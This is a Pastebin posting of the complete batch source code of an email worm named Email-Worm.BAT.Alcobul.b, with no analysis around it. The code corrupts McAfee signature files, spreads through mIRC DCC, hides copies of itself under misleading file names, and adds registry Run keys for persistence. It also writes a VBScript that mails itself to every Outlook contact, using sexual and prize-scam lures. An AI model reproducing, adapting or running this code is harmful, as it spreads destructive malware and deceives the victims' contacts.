FlyFar

Email-Worm.BAT.Alcobul.b - Source Code

Jun 11th, 2023
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 4.68 KB | Cybersecurity | 0 0
  1. :: console output is turned off and console is redirected to nul to prevent user interruptions
  2.  
  3. @echo off
  4.  
  5. ctty nul
  6.  
  7.  
  8.  
  9. :: Modify McAfee Dat files... Can anyone tell me where the dat files of AVP, Pccllin, fprot are located?
  10.  
  11. for %%f in (C:\progra~1\mcafee\mcafee~1\*.dat) do copy %0 %%f
  12.  
  13.  
  14.  
  15. :: spread to IRC
  16.  
  17. del c:\mIRC\script.ini
  18.  
  19. echo [script] > c:\mIRC\script.ini
  20.  
  21. echo n0= on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\WINDOWS\XPUpgrade.bat } >> c:\mIRC\script.ini
  22.  
  23. echo n1= /join #Beginner >> c:\mIRC\script.ini
  24.  
  25.  
  26.  
  27. :: goto root directory
  28.  
  29. cd\
  30.  
  31.  
  32.  
  33. :: make a hideaway folder, stealth with attrib
  34.  
  35. md XP
  36.  
  37. attrib +h +r c:\XP
  38.  
  39.  
  40.  
  41. :: spawn 8 clones.. some will be randomly used in attachments..
  42.  
  43. copy %0 c:\XP\xp.bat
  44.  
  45. copy %0 c:\Recycled\xp.bat
  46.  
  47. copy %0 c:\WINDOWS\HTTPRedirect.htm.bat
  48.  
  49. copy %0 c:\WINDOWS\SYSTEM32\Redirection.exe.bat
  50.  
  51. copy %0 c:\WINDOWS\COMMAND\PageRedirect.asp.bat
  52.  
  53. copy %0 c:\Redirect.php.bat
  54.  
  55. copy %0 c:\WINDOWS\SYSTEM\Redirection.bat
  56.  
  57. copy %0 c:\WINDOWS\XPUpgrade.bat
  58.  
  59.  
  60.  
  61. :: modify registry.. make worm run @ startup
  62.  
  63. echo REGEDIT4 > c:\X.reg
  64.  
  65. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
  66.  
  67. echo "PX"="c:\\XP\\xp.bat" >> c:\X.reg
  68.  
  69. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
  70.  
  71. echo "VPX"="c:\\XP\\X.vbs" >> c:\X.reg
  72.  
  73. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
  74.  
  75. echo "PXV"="c:\\Recycled\\xp.bat" >> c:\X.reg
  76.  
  77. regedit /s c:\X.reg
  78.  
  79. del c:\X.reg
  80.  
  81.  
  82.  
  83. :: is all new improved VBScript mailer present in c:\?
  84.  
  85. if exist c:\X.vbs goto goldfinger
  86.  
  87.  
  88.  
  89. :: if not, make the all new improved VBScript mailer
  90.  
  91. echo.on error resume next > c:\X.vbs
  92.  
  93. echo dim a,b,c,d,e >> c:\X.vbs
  94.  
  95. echo yelp = "Take a look at this.." >> c:\X.vbs
  96.  
  97. echo sex = "Hello former classmate.. I'm Heather and I have included a file which will redirect you to my webpage.. Full of nude picutres and stuff.. See you soon." >> c:\X.vbs
  98.  
  99. echo drugs = "You've won a free plane ticket to Hawaii. To claim your prize, we included a redirection software for security purposes. Only from FlyHawaii.com" >> c:\X.vbs
  100.  
  101. echo ass = "Wscript.Shell" >> c:\X.vbs
  102.  
  103. echo reg = "Check out my nude picture gallery.. Sarah.." >> c:\X.vbs
  104.  
  105. echo carry = "Hi there!" >> c:\X.vbs
  106.  
  107. echo hole = "Outlook.Application" >> c:\X.vbs
  108.  
  109. echo eins = "Hey.. Your mom sent me this message.. How dare your mom talk to me like that.. Shit!" >> c:\X.vbs
  110.  
  111. echo shit = "MAPI" >> c:\X.vbs
  112.  
  113. echo cum = "Hi there..You've just won a free backstage pass... Watch your favourite band/boyband perform live..Just tell us who do you want to see by clicking at this redirection software.. We make dreams come true..FreePasses.com" >> c:\X.vbs
  114.  
  115. echo dork = "Hello!" >> c:\X.vbs
  116.  
  117. echo suck = "I wanna tell you how much I adore you.." >> c:\X.vbs
  118.  
  119. echo set a = Wscript.CreateObject(ass) >> c:\X.vbs
  120.  
  121. echo punk = array(yelp, carry, dork, suck) >> c:\X.vbs
  122.  
  123. echo Randomize >> c:\X.vbs
  124.  
  125. echo rock = punk(Int(Rnd * 4)) >> c:\X.vbs
  126.  
  127. echo set b = CreateObject(hole) >> c:\X.vbs
  128.  
  129. echo set c = b.GetNameSpace(shit) >> c:\X.vbs
  130.  
  131. echo ska = array(cum, eins, sex, drugs, reg, yelp) >> c:\X.vbs
  132.  
  133. echo Randomize >> c:\X.vbs
  134.  
  135. echo reggae = ska(Int(Rnd * 6)) >> c:\X.vbs
  136.  
  137. echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
  138.  
  139. echo phile = "c:\WINDOWS\HTTPRedirect.htm.bat" >> c:\X.vbs
  140.  
  141. echo set d = c.AddressLists(y) >> c:\X.vbs
  142.  
  143. echo phile1 = "c:\WINDOWS\SYSTEM32\Redirection.exe.bat" >> c:\X.vbs
  144.  
  145. echo x = 1 >> c:\X.vbs
  146.  
  147. echo set e = b.CreateItem(0) >> c:\X.vbs
  148.  
  149. echo phile2 = "c:\WINDOWS\COMMAND\PageRedirect.asp.bat" >> c:\X.vbs
  150.  
  151. echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
  152.  
  153. echo f = d.AddressEntries(x) >> c:\X.vbs
  154.  
  155. echo e.Recipients.Add f >> c:\X.vbs
  156.  
  157. echo x = x + 1 >> c:\X.vbs
  158.  
  159. echo next >> c:\X.vbs
  160.  
  161. echo e.Subject = rock >> c:\X.vbs
  162.  
  163. echo phile3 = "c:\Redirect.php.bat" >> c:\X.vbs
  164.  
  165. echo e.Body = reggae >> c:\X.vbs
  166.  
  167. echo phile4 = "c:\WINDOWS\SYSTEM\Redirection.bat" >> c:\X.vbs
  168.  
  169. echo guns = array(phile, phile1, phile2, phile3, phile4) >> c:\X.vbs
  170.  
  171. echo Randomize >> c:\X.vbs
  172.  
  173. echo roses = guns(Int(Rnd * 5)) >> c:\X.vbs
  174.  
  175. echo e.Attachments.Add (roses) >> c:\X.vbs
  176.  
  177. echo e.DeleteAfterSubmit = True >> c:\X.vbs
  178.  
  179. echo e.Send >> c:\X.vbs
  180.  
  181. echo f = "" >> c:\X.vbs
  182.  
  183. echo next >> c:\X.vbs
  184.  
  185.  
  186.  
  187. :: put a copy of mailer in hideaway directory
  188.  
  189. copy c:\X.vbs c:\XP
  190.  
  191.  
  192.  
  193. :: Mailer present
  194.  
  195. :goldfinger
  196.  
  197.  
  198.  
  199. :: for assurance
  200.  
  201. copy c:\X.vbs c:\XP
  202.  
  203.  
  204.  
  205. :: Mail with attachment
  206.  
  207. start c:\X.vbs
  208.  
  209.  
  210.  
  211. :: hide core files
  212.  
  213. attrib +h +r c:\X.vbs
  214.  
  215. attrib +h +r c:\XP\X.vbs
  216.  
  217. attrib +h +r c:\XP\xp.bat
  218.  
  219.  
  220.  
  221. :: Good bye!
  222.  
  223. exit
  224.  
  225.  
  226.  
  227. ::Redirection by Alcopaul
  228.  
Add Comment
Please, Sign In to add comment